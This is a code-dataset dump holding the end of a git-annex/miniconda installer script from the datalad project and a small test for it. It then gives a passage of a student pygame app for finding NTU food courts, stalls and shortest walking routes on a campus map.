self._install_via_autobuild_or_snapshot_macos(\"OSX/current/10.10_Yosemite\")\n else:\n raise RuntimeError(f\"E: Unsupported OS: {systype}\")\n\n def _install_via_autobuild_or_snapshot_linux(self, subpath):\n tmpdir = tempfile.mkdtemp(prefix=\"ga-\")\n self.annex_bin = os.path.join(tmpdir, \"git-annex.linux\")\n log.info(\"downloading and extracting under %s\", self.annex_bin)\n gzfile = os.path.join(tmpdir, \"git-annex-standalone-amd64.tar.gz\")\n download_file(\n f\"https://downloads.kitenet.net/git-annex/{subpath}/git-annex-standalone-amd64.tar.gz\",\n gzfile,\n )\n subprocess.run([\"tar\", \"-C\", tmpdir, \"-xzf\", gzfile], check=True)\n self.addpath(self.annex_bin)\n self.post_install()\n\n def _install_via_autobuild_or_snapshot_macos(self, subpath):\n with tempfile.TemporaryDirectory() as tmpdir:\n dmgpath = os.path.join(tmpdir, \"git-annex.dmg\")\n download_file(\n f\"https://downloads.kitenet.net/git-annex/{subpath}/git-annex.dmg\",\n dmgpath,\n )\n self._install_from_dmg(dmgpath)\n self.post_install()\n\n def install_via_conda_forge(self, version=None, miniconda_path=None, batch=False):\n tmpdir = tempfile.mkdtemp(prefix=\"ga-\")\n self.annex_bin = os.path.join(tmpdir, \"annex-bin\")\n self.addpath(self.annex_bin)\n self._install_via_conda(version, tmpdir, miniconda_path, batch)\n\n def install_via_conda_forge_last(\n self, version=None, miniconda_path=None, batch=False\n ):\n tmpdir = tempfile.mkdtemp(prefix=\"ga-\")\n self.annex_bin = os.path.join(tmpdir, \"annex-bin\")\n if shutil.which(\"git-annex\") is not None:\n log.warning(\n \"git annex already installed. In this case this setup has no sense\"\n )\n sys.exit(1)\n # We are interested only to get git-annex into our environment\n # So as to not interfere with \"system wide\" Python etc, we will add\n # miniconda at the end of the path\n self.addpath(self.annex_bin, last=True)\n self._install_via_conda(version, tmpdir, miniconda_path, batch)\n\n def _install_via_conda(self, version, tmpdir, miniconda_path=None, batch=False):\n if miniconda_path is None:\n miniconda_path = os.path.join(tmpdir, \"miniconda\")\n conda_bin = os.path.join(miniconda_path, \"bin\")\n # We will symlink git-annex only under a dedicated directory, so it could be\n # used with default Python etc. If names changed here, possibly adjust\n # hardcoded duplicates below where we establish relative symlinks.\n self.install_miniconda(miniconda_path, batch=batch)\n subprocess.run(\n [\n os.path.join(conda_bin, \"conda\"),\n \"install\",\n \"-q\",\n \"-c\",\n \"conda-forge\",\n \"-y\",\n f\"git-annex={version}\" if version is not None else \"git-annex\",\n ],\n check=True,\n )\n if self.annex_bin != conda_bin:\n annex_bin = Path(self.annex_bin)\n annex_bin.mkdir(parents=True, exist_ok=True)\n for p in Path(conda_bin).glob(\"git-annex*\"):\n (annex_bin / p.name).symlink_to(p.resolve())\n self.post_install()\n\n def install_miniconda(self, miniconda_path, batch=False):\n systype = platform.system()\n if systype == \"Linux\":\n miniconda_script = \"Miniconda3-latest-Linux-x86_64.sh\"\n elif systype == \"Darwin\":\n miniconda_script = \"Miniconda3-latest-MacOSX-x86_64.sh\"\n else:\n raise RuntimeError(f\"E: Unsupported OS: {systype}\")\n log.info(\"Downloading and running miniconda installer\")\n with tempfile.TemporaryDirectory() as tmpdir:\n script_path = os.path.join(tmpdir, miniconda_script)\n download_file(\n (\n os.environ.get(\"ANACONDA_URL\")\n or \"https://repo.anaconda.com/miniconda/\"\n )\n + miniconda_script,\n script_path,\n )\n log.info(\"Installing miniconda in %s\", miniconda_path)\n args = [\"-p\", str(miniconda_path), \"-s\"]\n if batch:\n args.append(\"-b\")\n subprocess.run([\"bash\", script_path] + args, check=True)\n\n def install_datalad(self, miniconda_path, batch=False):\n self.install_miniconda(miniconda_path, batch)\n subprocess.run(\n [\n os.path.join(miniconda_path, \"bin\", \"conda\"),\n \"install\",\n \"-q\",\n \"-c\",\n \"conda-forge\",\n \"-y\",\n \"datalad\",\n ],\n check=True,\n )\n\n def install_via_datalad_git_annex_build(self):\n with tempfile.TemporaryDirectory() as tmpdir:\n systype = platform.system()\n if systype == \"Linux\":\n download_latest_git_annex(\"ubuntu\", tmpdir)\n (debpath,) = Path(tmpdir).glob(\"*.deb\")\n subprocess.run([\"sudo\", \"dpkg\", \"-i\", str(debpath)], check=True)\n elif systype == \"Darwin\":\n download_latest_git_annex(\"macos\", tmpdir)\n (dmgpath,) = Path(tmpdir).glob(\"*.dmg\")\n self._install_from_dmg(dmgpath)\n else:\n raise RuntimeError(f\"E: Unsupported OS: {systype}\")\n self.post_install()\n\n def install_via_brew(self):\n subprocess.run([\"brew\", \"install\", \"git-annex\"], check=True)\n self.annex_bin = \"/usr/local/bin\"\n self.post_install()\n\n def _install_from_dmg(self, dmgpath):\n subprocess.run([\"hdiutil\", \"attach\", str(dmgpath)], check=True)\n subprocess.run(\n [\"rsync\", \"-a\", \"/Volumes/git-annex/git-annex.app\", \"/Applications/\"],\n check=True,\n )\n subprocess.run([\"hdiutil\", \"detach\", \"/Volumes/git-annex/\"], check=True)\n self.annex_bin = \"/Applications/git-annex.app/Contents/MacOS\"\n self.addpath(self.annex_bin)\n\n def post_install(self):\n if self.adjust_bashrc and self.pathline is not None:\n # If PATH was changed, we need to make it available to SSH commands.\n # Note: Prepending is necessary. SSH commands load .bashrc, but many\n # distributions (including Debian and Ubuntu) come with a snippet\n # to exit early in that case.\n bashrc = Path.home() / \".bashrc\"\n contents = bashrc.read_text()\n bashrc.write_text(self.pathline + \"\\n\" + contents)\n log.info(\"Adjusted first line of ~/.bashrc:\")\n log.info(\"%s\", self.pathline)\n # Rudimentary test of installation and inform user about location\n for binname in [\"git-annex\", \"git-annex-shell\"]:\n if not os.access(os.path.join(self.annex_bin, binname), os.X_OK):\n raise RuntimeError(f\"Cannot execute {binname}\")\n log.info(\"git-annex is available under %r\", self.annex_bin)\n\n\ndef download_file(url, path, headers=None):\n if headers is None:\n headers = {}\n req = Request(url, headers=headers)\n with urlopen(req) as r:\n with open(path, \"wb\") as fp:\n shutil.copyfileobj(r, fp)\n\n\ndef download_latest_git_annex(ostype, target_path: Path):\n repo = \"datalad/git-annex\"\n branch = \"master\"\n workflow = f\"build-{ostype}.yaml\"\n token = os.environ.get(\"GITHUB_TOKEN\")\n if not token:\n r = subprocess.run(\n [\"git\", \"config\", \"hub.oauthtoken\"],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n )\n if r.returncode != 0 or not r.stdout.strip():\n raise RuntimeError(\n \"GitHub OAuth token not set. Set via GITHUB_TOKEN environment\"\n \" variable or hub.oauthtoken Git config option.\"\n )\n token = r.stdout.strip()\n\n def apicall(url):\n req = Request(url, headers={\"Authorization\": f\"Bearer {token}\"})\n with urlopen(req) as r:\n return json.load(r)\n\n jobs_url = (\n f\"https://api.github.com/repos/{repo}/actions/workflows/{workflow}/runs\"\n f\"?status=success&branch={branch}\"\n )\n log.info(\"Getting artifacts_url from %s\", jobs_url)\n jobs = apicall(jobs_url)\n try:\n artifacts_url = jobs[\"workflow_runs\"][0][\"artifacts_url\"]\n except LookupError:\n log.exception(\"Unable to get artifacts_url\")\n raise\n log.info(\"Getting archive download URL from %s\", artifacts_url)\n artifacts = apicall(artifacts_url)\n if artifacts[\"total_count\"] < 1:\n raise RuntimeError(\"No artifacts found!\")\n elif artifacts[\"total_count\"] > 1:\n raise RuntimeError(\"Too many artifacts found!\")\n else:\n archive_download_url = artifacts[\"artifacts\"][0][\"archive_download_url\"]\n log.info(\"Downloading artifact package from %s\", archive_download_url)\n target_path.mkdir(parents=True, exist_ok=True)\n artifact_path = target_path / \".artifact.zip\"\n download_file(\n archive_download_url,\n artifact_path,\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n with ZipFile(str(artifact_path)) as zipf:\n zipf.extractall(str(target_path))\n artifact_path.unlink()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5904255509376526, "alphanum_fraction": 0.5904255509376526, "avg_line_length": 25.11111068725586, "blob_id": "5ac1cc0ffc5b46a5f24b3f90f79c2e9f6b196555", "content_id": "9c56b6c864851d7b60c51c4abce69cea89caa5c0", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 940, "license_type": "permissive", "max_line_length": 92, "num_lines": 36, "path": "/datalad/tests/test_install.py", "repo_name": "djarecka/datalad", "src_encoding": "UTF-8", "text": "import os.path\nfrom pathlib import Path\nimport subprocess\nimport sys\nfrom .utils import (\n assert_in,\n skip_if_on_windows,\n turtle,\n with_tempfile,\n)\n\n\n@turtle\n@skip_if_on_windows # all development for this functionality is moving to datalad-installer\n@with_tempfile(mkdir=True)\ndef test_install_miniconda(tmpdir):\n miniconda_path = os.path.join(tmpdir, \"conda\")\n subprocess.run(\n [\n sys.executable,\n os.path.join(\"datalad\", \"install.py\"),\n \"miniconda\",\n \"--batch\",\n \"--path-miniconda\",\n miniconda_path,\n ],\n cwd=Path(__file__).resolve().parent.parent.parent,\n check=True,\n )\n r = subprocess.run(\n [os.path.join(miniconda_path, \"bin\", \"conda\"), \"create\", \"-n\", \"test\", \"-y\"],\n stdout=subprocess.PIPE,\n universal_newlines=True,\n check=True,\n )\n assert_in(\"conda activate test\", r.stdout)\n" } ]
3
nhanpotter/NTU-FoodBeverage
https://github.com/nhanpotter/NTU-FoodBeverage
f8d811edffd1028da73a55408744b2ef70be6225
afb3e0803170b3405fa9c581562cdde3e3fc782e
593968ff471571dc0ecb6ccc39abd1ed70a60980
refs/heads/master
2020-04-19T18:46:02.314405
2019-01-30T16:18:25
2019-01-30T16:18:25
168,371,729
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4804449677467346, "alphanum_fraction": 0.5123085379600525, "avg_line_length": 49.25837707519531, "blob_id": "356e491fb77e082da53e307dcbb507f279351b01", "content_id": "745a1024137a60fc3f13b829a59d6ce095c91df4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56993, "license_type": "no_license", "max_line_length": 225, "num_lines": 1134, "path": "/main_project.py", "repo_name": "nhanpotter/NTU-FoodBeverage", "src_encoding": "UTF-8", "text": "import pygame\nimport pickle\nimport datetime\nimport time\nimport sys, math\nfrom shortest_distance import shortest_path\nfrom sort_and_search import *\n\n###define constants, colors, ...\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nGREEN = (0, 255, 0)\nGREY = (200, 200, 200)\nBROWN = (255, 248, 220)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\n\nFPS = 60\nWIDTH = WIDTH_INIT = 1200\nHEIGHT = HEIGHT_INIT = 800\nBLIT_X = 0\nBLIT_Y = 0\nSTEP = 40\nRATIO = 1.3\n###load image and music\nwindow_surface = pygame.display.set_mode((WIDTH_INIT, HEIGHT_INIT))\noriginal_image = pygame.image.load(\"NTUmap.png\")\nimage = pygame.transform.scale(original_image, (WIDTH, HEIGHT))\ntick_image = pygame.image.load(\"tick.png\")\n\n###initialize pygame and create window\nclock = pygame.time.Clock()\npygame.init()\n\n\n###class of objects\n# Foodcourt (including stall)\nclass FoodCourt:\n\n # initialise\n def __init__(self, name, address, number):\n self.name = name # arguments to set all the instance variables\n self.address = address\n self.number = number\n self.stall_list = []\n\n def addStall(self, stall_name, category, aircon_availability, address, wkday_op_time, wkday_cl_time, wkend_op_time,\n wkend_cl_time):\n s = Stall(stall_name, category, aircon_availability, address, wkday_op_time, wkday_cl_time, wkend_op_time,\n wkend_cl_time)\n self.stall_list.append(s) # stalls added into FoodCourt obj (Stall obj belongs to FoodCourt obj)\n\n def addFood(self, stall_name, food_name, price, rating):\n found = False # to ensure that stall name is added in the correct format (Can prevent typos etc)\n for s_name in self.stall_list:\n if (s_name.name == stall_name):\n found = True\n break\n if found == False:\n print(\"ERROR : Stall not found, unable to add\", food_name, \"in\", stall_name)\n return\n\n try: # to ensure that price and rating of the food are added in the correct format (ie. price cannot be negative, ratings cannot be more than 5)\n if price > 0 and (rating > 0 and rating <= 5):\n for stall in self.stall_list:\n if stall.name == stall_name:\n stall.addFood(food_name, price,\n rating) # Procedural abstraction: Only need to call this function (addFood) to add the food, the FoodCourt class does not need to know how the Stall class implements the addFood function\n else:\n raise ValueError\n except ValueError:\n\n print(\"ERROR : Couldn't add\", food_name, \"to\", stall_name, \"with price\", price)\n\n def searchFoodByName(self, food_name):\n __searchResultList = []\n for stall in self.stall_list:\n list1 = stall.searchFoodByName(food_name) # this result is returned from the function in Stall object\n for food in list1:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n # for each of the result from the Stall object, a dict will be created\n \"Food Name\": food.name,\n \"Price\": food.price,\n \"Rating\": food.rating,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def searchByPrice(self, min, max):\n __searchResultList = []\n for stall in self.stall_list:\n list1 = stall.searchByPrice(min, max) # this result is returned from the function in Stall object\n for food in list1:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n \"Food Name\": food.name,\n \"Price\": food.price,\n \"Rating\": food.rating,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def searchByCategory(self, user_food_category):\n __searchResultList = []\n for stall in self.stall_list:\n food_belongs_to_cat = stall.checkIfBelongToCategory(\n user_food_category) # this result is returned from the function in Stall object\n if food_belongs_to_cat == True:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n \"Category\": stall.category,\n \"Address\": stall.address,\n \"Contact Number\": self.number,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def getStalls(self):\n __searchResultList = []\n for stall in self.stall_list:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n \"Category\": stall.category,\n \"Address\": stall.address,\n \"Contact Number\": self.number,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def searchByAirconAvailability(self, user_aircon):\n __searchResultList = []\n for stall in self.stall_list: # goes thru all the stalls in the stall list and returns a dict of stalls with aircon or no aircon (based on input from user_aircon)\n if stall.aircon_availability.lower() == user_aircon:\n result_dict = {\"Food Court Name\": self.name,\n \"Stall Name\": stall.name,\n \"Aircon Availability\": stall.aircon_availability,\n \"Weekday Opening Hours\": stall.wkday_op_time + \"-\" + stall.wkday_cl_time,\n \"Weekend Opening Hours\": stall.wkend_op_time + \"-\" + stall.wkend_cl_time,\n \"Open/Close\": stall.getStallStatus()}\n __searchResultList.append(result_dict)\n return __searchResultList\n\n def getStallByName(self, sname):\n __searchResultList = []\n for stall in self.stall_list:\n if sname.lower() in stall.name.lower():\n __searchResultList.append(stall)\n return __searchResultList\n\n\n# Stall (including Food)\nclass Stall:\n\n # intialise\n def __init__(self, name, category, aircon_availability, address, wkday_op_time, wkday_cl_time, wkend_op_time,\n wkend_cl_time):\n self.name = name\n self.category = category\n self.address = address\n self.aircon_availability = aircon_availability\n self.wkday_op_time = wkday_op_time\n self.wkday_cl_time = wkday_cl_time\n self.wkend_op_time = wkend_op_time\n self.wkend_cl_time = wkend_cl_time\n self.food_list = []\n\n def addFood(self, name, price, rating):\n f = Food(name, price, rating) # from Food object bc Food obj belongs to Stall obj\n self.food_list.append(f)\n\n def checkIfBelongToCategory(self, user_input_category):\n splitted_category = self.category.split(\",\") # split the categories in 1 food\n splitted_user_category = user_input_category.split(\n \",\") # split the categories that the user inputted (user has to input in x,y format when searchng by categories)\n no_of_matches = len(splitted_user_category)\n for user_cat in splitted_user_category:\n for category in splitted_category:\n if category.strip().lower() == user_cat.strip().lower():\n no_of_matches -= 1\n break\n\n if no_of_matches == 0:\n return True\n else:\n return False\n\n def time_in_range(self, start, end, x):\n # \"\"\"Return true if x is in the range [start, end]\"\"\"\n if start <= end:\n return start <= x <= end\n else:\n return start <= x or x <= end\n\n def getStallStatus(self):\n # Compare the time here and return open or close\n splitted_wkday_op_time = self.wkday_op_time.split(\":\")\n splitted_wkday_cl_time = self.wkday_cl_time.split(\":\")\n wkday_op_hour_int = int(splitted_wkday_op_time[0])\n wkday_op_min_int = int(splitted_wkday_op_time[1])\n wkday_cl_hour_int = int(splitted_wkday_cl_time[0])\n wkday_cl_min_int = int(splitted_wkday_cl_time[1])\n\n splitted_wkend_op_time = self.wkend_op_time.split(\":\")\n splitted_wkend_cl_time = self.wkend_cl_time.split(\":\")\n wkend_op_hour_int = int(splitted_wkend_op_time[0])\n wkend_op_min_int = int(splitted_wkend_op_time[1])\n wkend_cl_hour_int = int(splitted_wkend_cl_time[0])\n wkend_cl_min_int = int(splitted_wkend_cl_time[1])\n\n current_hour = datetime.datetime.now().hour\n current_min = datetime.datetime.now().minute\n current_wkday = datetime.datetime.today().weekday()\n\n if current_wkday in range(0, 5):\n start = datetime.time(wkday_op_hour_int, wkday_op_min_int, 0)\n end = datetime.time(wkday_cl_hour_int, wkday_cl_min_int, 0)\n stall_opening = self.time_in_range(start, end, datetime.time(current_hour, current_min, 0))\n if stall_opening == True:\n return (\"OPEN\")\n else:\n return (\"CLOSED\")\n\n elif current_wkday in range(5, 7):\n start = datetime.time(wkend_op_hour_int, wkend_op_min_int, 0)\n end = datetime.time(wkend_cl_hour_int, wkend_cl_min_int, 0)\n stall_opening = self.time_in_range(start, end, datetime.time(current_hour, current_min, 0))\n if stall_opening == True:\n return (\"OPEN\")\n else:\n return (\"CLOSED\")\n\n # def between(self, a, b, c): #check if b is in between a and c\n # return ((a <= b) and (b < c)) or ((c < a) and (a <= b)) or ((b < c) and (c < a))\n\n def searchFoodByName(self, food_name):\n __resultList = []\n for food in self.food_list:\n if len(food_name) > 0:\n if food_name.lower() in food.name.lower(): # the keyword 'in' is to check whether a word contains in another word under food names\n __resultList.append(food)\n else: # if nth is inputted (eg. user inputs space bar), len of food_name is 0, so all the food belonging to this stall will be appended into the list\n __resultList.append(food)\n return __resultList\n\n def searchByPrice(self, min,\n max): # user enter min and max price and will return a list of food within the searched range\n __resultlist = []\n self.food_list = sorted(self.food_list, key=lambda x: x.price)\n for food in self.food_list:\n if food.price >= min and food.price <= max:\n __resultlist.append(food)\n return __resultlist\n\n def getFood(self, user_input):\n __searchResultList = []\n for food in self.food_list:\n if user_input.lower() in food.name.lower():\n __searchResultList.append(food)\n return __searchResultList\n\n\n# Food\nclass Food:\n # intialise\n def __init__(self, name, price, rating): # add the details of the foods into the Food object\n self.name = name\n self.price = price\n self.rating = rating\n\n\n# Vertex\nclass Vertex:\n def __init__(self, name, coordinates):\n self.name = name\n self.coordinates = coordinates\n self.distance = sys.maxsize\n self.predecessor = None\n self.visited = False\n self.adjacent = {}\n\n def __lt__(self, other):\n self_priority = self.distance\n other_priority = other.distance\n return self_priority < other_priority\n\n\n# Graph (contain Vertex)\nclass Graph:\n def __init__(self):\n self.vertex_set = []\n\n def add_vertex(self, name, coordinates):\n v = Vertex(name, coordinates)\n self.vertex_set.append(v)\n\n def add_adjacent(self, vertex1, vertex2):\n for node1 in self.vertex_set:\n if node1.name == vertex1:\n for node2 in self.vertex_set:\n if node2.name == vertex2:\n weight_x = node1.coordinates[0] - node2.coordinates[0]\n weight_y = node1.coordinates[1] - node2.coordinates[1]\n weight = math.sqrt(weight_x ** 2 + weight_y ** 2)\n node1.adjacent[node2.name] = weight\n node2.adjacent[node1.name] = weight\n\n def get_adjacent(self):\n list = []\n for vert in self.vertex_set:\n list.append(vert.adjacent)\n return list\n\n def set_start(self, posX, posY):\n nearest_distance = sys.maxsize\n for index, node in enumerate(self.vertex_set):\n if math.sqrt((node.coordinates[0] - posX) ** 2 + (node.coordinates[1] - posY) ** 2) < nearest_distance:\n nearest_distance = math.sqrt((node.coordinates[0] - posX) ** 2 + (node.coordinates[1] - posY) ** 2)\n nearest_index = index\n self.vertex_set[nearest_index].distance = nearest_distance # modify later\n return nearest_index\n\n def get_index(self, name):\n for index, node in enumerate(self.vertex_set):\n if node.name == name:\n return index\n\n\n# class for UI\nclass Textbox:\n def __init__(self, x, y, w, h, text, color, font_size=20):\n self.w = w\n self.h = h\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x, self.y, self.w, self.h)\n self.font = pygame.font.Font('freesansbold.ttf', font_size)\n self.text = text\n self.color = color\n text_srf = self.font.render(self.text, True, self.color)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n\n def draw_align(self, y_new, h_new, text_new):\n align_rect = pygame.Rect(self.x, y_new, self.w, h_new)\n text_align = self.font.render(text_new, True, self.color)\n text_align_rect = text_align.get_rect()\n text_align_rect.center = align_rect.center\n window_surface.blit(text_align, text_align_rect)\n\n\nclass Button:\n def __init__(self, x, y, w, h, text, color, font_size=20):\n self.w = w\n self.h = h\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x, self.y, self.w, self.h)\n self.font = pygame.font.Font('freesansbold.ttf', font_size)\n self.big_font = pygame.font.Font('freesansbold.ttf', font_size + 5)\n self.text = text\n pygame.draw.rect(window_surface, color, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_srf = self.font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n\n def move_and_click(self, mouseX, mouseY, color_click, counter, reverse):\n global screen_running\n mouseX_unclicked, mouseY_unclicked = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX_unclicked, mouseY_unclicked):\n pygame.draw.rect(window_surface, color_click, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_srf = self.big_font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n if self.rect.collidepoint(mouseX, mouseY):\n screen_running = False\n if reverse == False:\n counter += 1\n if reverse == True:\n counter -= 1\n time.sleep(0.2)\n return counter\n\n def move_and_take(self, mouseX, mouseY, color_click, counter, last):\n global screen_running\n map_index = None\n mouseX_unclicked, mouseY_unclicked = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX_unclicked, mouseY_unclicked):\n pygame.draw.rect(window_surface, color_click, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_srf = self.big_font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n if self.rect.collidepoint(mouseX, mouseY):\n screen_running = False\n counter += 1\n if last == False:\n map_index = -12 + self.y / 50\n else:\n map_index = -100 + self.y\n time.sleep(0.2)\n return counter, map_index\n\n def click_only(self, color_click, counter, reverse):\n mouseX_unclicked, mouseY_unclicked = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX_unclicked, mouseY_unclicked):\n pygame.draw.rect(window_surface, color_click, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_srf = self.big_font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n mouse_pressed = pygame.mouse.get_pressed()\n mouseX = mouseY = 0\n if mouse_pressed[0]:\n mouseX, mouseY = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX, mouseY):\n if reverse == False:\n counter += 1\n if reverse == True:\n counter -= 1\n time.sleep(0.1)\n mouseX = mouseY = 0\n return counter\n\n def move_and_update(self, mouseX, mouseY, color_click):\n map_index = None\n mouseX_unclicked, mouseY_unclicked = pygame.mouse.get_pos()\n if self.rect.collidepoint(mouseX_unclicked, mouseY_unclicked):\n pygame.draw.rect(window_surface, color_click, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_srf = self.big_font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.center = self.rect.center\n window_surface.blit(text_srf, text_rect)\n if self.rect.collidepoint(mouseX, mouseY):\n map_index = -2 + self.y / 50\n return map_index\n\n\nclass Inputbox:\n def __init__(self, x, y, w, h, text, font_size=20):\n self.w = w\n self.h = h\n self.x = x\n self.y = y\n self.rect = pygame.Rect(self.x, self.y, self.w, self.h)\n self.font = pygame.font.Font('freesansbold.ttf', font_size)\n self.text = text\n self.active = False # also use for Yes or No\n self.string = \"\"\n self.color = GREY\n\n def input_text(self, event):\n text_srf = self.font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.midright = self.rect.midleft\n window_surface.blit(text_srf, text_rect)\n unuse_key = [pygame.K_RETURN, pygame.K_LEFT, pygame.K_DOWN, pygame.K_UP, pygame.K_RIGHT, pygame.K_BACKSPACE]\n # for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect.\n if self.rect.collidepoint(event.pos):\n # Toggle the active variable.\n self.active = not self.active\n else:\n self.active = False\n # Change the current color of the input box.\n self.color = WHITE if self.active else GREY\n if event.type == pygame.KEYDOWN:\n if self.active:\n # if not event.key in unuse_key:\n if event.key == pygame.K_BACKSPACE and len(self.string) > 0:\n self.string = self.string[:-1]\n if not event.key in unuse_key:\n self.string += event.unicode\n pygame.draw.rect(window_surface, self.color, self.rect)\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n text_input_srf = self.font.render(self.string, True, BLACK)\n text_input_rect = text_input_srf.get_rect()\n text_input_rect.midleft = self.rect.midleft\n window_surface.blit(text_input_srf, text_input_rect)\n\n def tick_box(self, event):\n text_srf = self.font.render(self.text, True, BLACK)\n text_rect = text_srf.get_rect()\n text_rect.midright = self.rect.midleft\n window_surface.blit(text_srf, text_rect)\n if event.type == pygame.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect.\n if self.rect.collidepoint(event.pos):\n # Toggle the active variable.\n self.active = not self.active\n # Change the current color of the input box.\n if not self.active:\n pygame.draw.rect(window_surface, self.color, self.rect)\n if self.active:\n pygame.draw.rect(window_surface, self.color, self.rect)\n tick = pygame.transform.scale(tick_image, (self.w, self.h))\n window_surface.blit(tick, (self.x, self.y))\n pygame.draw.rect(window_surface, BLACK, self.rect, 1)\n\n\n###function\ndef zoom_in():\n global WIDTH, HEIGHT, BLIT_X, BLIT_Y\n OLD_WIDTH, OLD_HEIGHT = WIDTH, HEIGHT\n WIDTH *= RATIO\n WIDTH = round(WIDTH)\n HEIGHT *= RATIO\n HEIGHT = round(HEIGHT)\n BLIT_X -= (WIDTH - OLD_WIDTH) / 2\n BLIT_Y -= (HEIGHT - OLD_HEIGHT) / 2\n\n\ndef zoom_out():\n global WIDTH, HEIGHT, BLIT_X, BLIT_Y\n OLD_WIDTH, OLD_HEIGHT = WIDTH, HEIGHT\n WIDTH /= RATIO\n WIDTH = round(WIDTH)\n HEIGHT /= RATIO\n HEIGHT = round(HEIGHT)\n BLIT_X -= (WIDTH - OLD_WIDTH) / 2\n BLIT_Y -= (HEIGHT - OLD_HEIGHT) / 2\n\n\ndef zoom_initial():\n global WIDTH, HEIGHT, BLIT_X, BLIT_Y\n if BLIT_X > 0:\n BLIT_X = 0\n elif BLIT_X < WIDTH_INIT - WIDTH:\n BLIT_X = WIDTH_INIT - WIDTH\n if BLIT_Y > 0:\n BLIT_Y = 0\n elif BLIT_Y < HEIGHT_INIT - HEIGHT:\n BLIT_Y = HEIGHT_INIT - HEIGHT\n\n\ndef mouse_to_pos(BLIT_X, BLIT_Y, WIDTH, HEIGHT, mouseX, mouseY):\n x = round((mouseX - BLIT_X) * WIDTH_INIT / WIDTH)\n y = round((mouseY - BLIT_Y) * HEIGHT_INIT / HEIGHT)\n return x, y\n\n\ndef main():\n global OLD_WIDTH, OLD_HEIGHT, WIDTH, HEIGHT, BLIT_X, BLIT_Y, FPS, screen_running, screen_counter\n screen_counter = 1\n subscreen1_counter = subscreen2_counter = subscreen3_counter = subscreen4_counter = 0\n mapscreen1_counter = mapscreen2_counter = 0\n map2_name = 0\n\n zoom_i = 0\n #######\n while True:\n file_data = open(\"main_data.txt\", \"rb\")\n foodcourt_list = pickle.load(file_data)\n node_data = open(\"node_data.txt\", \"rb\")\n g = pickle.load(node_data)\n if screen_counter == 1:\n mouseX = mouseY = posX = posY = 0\n screen_running = True\n while screen_running:\n pressed = pygame.key.get_pressed()\n mouse_pressed = pygame.mouse.get_pressed()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n ### using map\n if pressed[pygame.K_LEFTBRACKET] and 0 <= zoom_i < 5:\n zoom_in()\n zoom_i += 1\n elif pressed[pygame.K_RIGHTBRACKET] and 0 < zoom_i <= 5:\n zoom_out()\n zoom_i -= 1\n if pressed[pygame.K_RIGHT]:\n BLIT_X -= STEP\n elif pressed[pygame.K_DOWN]:\n BLIT_Y -= STEP\n elif pressed[pygame.K_LEFT]:\n BLIT_X += STEP\n elif pressed[pygame.K_UP]:\n BLIT_Y += STEP\n zoom_initial() # if the screen get out of the window\n #\n image = 